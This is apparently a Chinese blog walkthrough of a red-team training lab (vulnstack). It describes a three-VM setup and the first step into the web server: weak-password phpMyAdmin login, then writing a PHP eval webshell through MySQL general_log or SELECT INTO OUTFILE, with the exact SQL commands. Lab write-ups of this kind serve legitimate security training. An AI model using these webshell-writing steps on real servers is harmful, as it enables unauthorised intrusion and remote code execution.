ATT&CK实战系列-红队实战（一）

admin

136446
文章

111
评论

2025年2月17日13:33:44评论11 views字数 2019阅读6分43秒阅读模式

地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境下载

下载靶场环境，并导入虚拟机分别是win2003、win7、winserver2008

配置网络

虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式分配的地址是192.168.52.0

配置好地址后，需要将win2003和winserver2008的网卡设置为VMnet2

win7的网络需要两张，一张为VMnet2，一张为NAT(我这用的是台式机搭建靶场，笔记本作为攻击机，所以用的桥接网络)

总结：win7为web服务器双网卡，通外网。win2003和2008为域内服务器。win7：192.168.0.105、192.168.52.143win2003：192.168.52.138win2008:192.168.52.141

外网渗透

1、已知目标的外网是192.168.0.1052、扫描ip的端口，获得80和3306端口。

3、访问80端口获得phpstudy探针，获得绝对路径，探测出数据库弱口令

4、扫描192.168.0.105的目录获得phpmyadmin目录

5、访问phpmyadmin通过弱口令登录

6、通过日志写入webshellSHOW VARIABLES LIKE '%general%' #查看日志

set global general_log = "ON" #开启日志记录

set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件

select "<?php eval($_POST['123'])?>" #写入webshell

访问webshell

使用蚁剑连接木马

7、phpmyadmin的getshell方法

（1）Select into Outfile：这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。 show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值如果secure_file_priv的值为null，表示限制mysqld不允许导入或导出如果secure_file_priv的值为某个具体的目录路径（例如/tmp/），表示限制mysqld的导入或导出只能发生在该目录下如果secure_file_priv没有具体值，表示不对mysqld的导入或导出做限制在MySQL 5.5之前，secure_file_priv默认是空，这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后，secure_file_priv默认是NULL，这个情况下不可以写文件。

（2）日志文件操作：这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径 SHOW VARIABLES LIKE '%general%' #查看日志 set global general_log = "ON" #开启日志记录 set global general_log_file = "D:/phpStudy/WWW/1.php" #指定日志文件 select "<?php eval($_POST['123'])?>" #写入webshell

以上所有方法都需要满足某些条件，例如具有写权限并知道webroot的绝对路径。